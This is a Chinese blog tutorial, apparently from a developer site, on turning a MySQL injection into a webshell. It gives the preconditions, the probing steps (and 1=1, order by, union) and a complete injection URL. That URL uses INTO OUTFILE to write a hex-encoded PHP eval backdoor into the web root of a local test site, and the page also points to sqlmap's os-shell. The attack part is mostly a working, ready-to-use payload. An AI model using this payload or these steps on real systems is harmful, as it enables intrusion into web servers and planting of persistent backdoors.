mysql注入攻击getshell_【sql注入教程】mysql注入直接getshell

Mysql注入直接getshell的條件相對來說比較苛刻點把

1:要知道網站絕對路徑,可以通過報錯,phpinfo界面,404界面等一些方式知道

2:gpc沒有開啟,開啟了單引號被轉義了,語句就不能正常執行了

3:要有file權限,默認情況下只有root有

4:對目錄要有寫權限,一般image之類的存放突破的目錄就有

在實際環境中我只遇過一次,為了做實驗,我把php.ini文件里面的gpc改為了Off,重啟了一下apahce服務

首先是常規的注入語句

And 1=1 and 1=2 之類的,在輸入單引號的時候報錯了得到了覺得路徑,寫shell需要用到

28a91e5204f6aecdb208e18932a34b27.png

然后order by union等

036305e4b7ccfe10d2e26839ecb66ff9.png

原創文章,希望大家多多支持

然后就是用into outfile寫文件

http://127.0.0.1/mysqltest/index.php?age=25%20union%20select%201,2,3,4,0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e%20into%20outfile%20%27C:/appserv/www/mysqltest/shell1.php%27

0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e是hex編碼的<?php eval($_POST['test'])?>

寫的文件名一定要是不存在的,不然就會不成功

這里的路徑要用/,如果要用\的話,就要用\\轉移成一個\如

C:\\appserv\\www\\mysqltest\\shell1.php

6745355e1300e929dea08e068baf66e7.png

7ee651b14c54bb56e87ed7782c64fb21.png

也可以直接用穿山甲來寫

ec5d1d2ddc84ecd36b9bec221c3922be.png

或者sqlmap的os-shell

原創文章,希望大家多多支持我

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值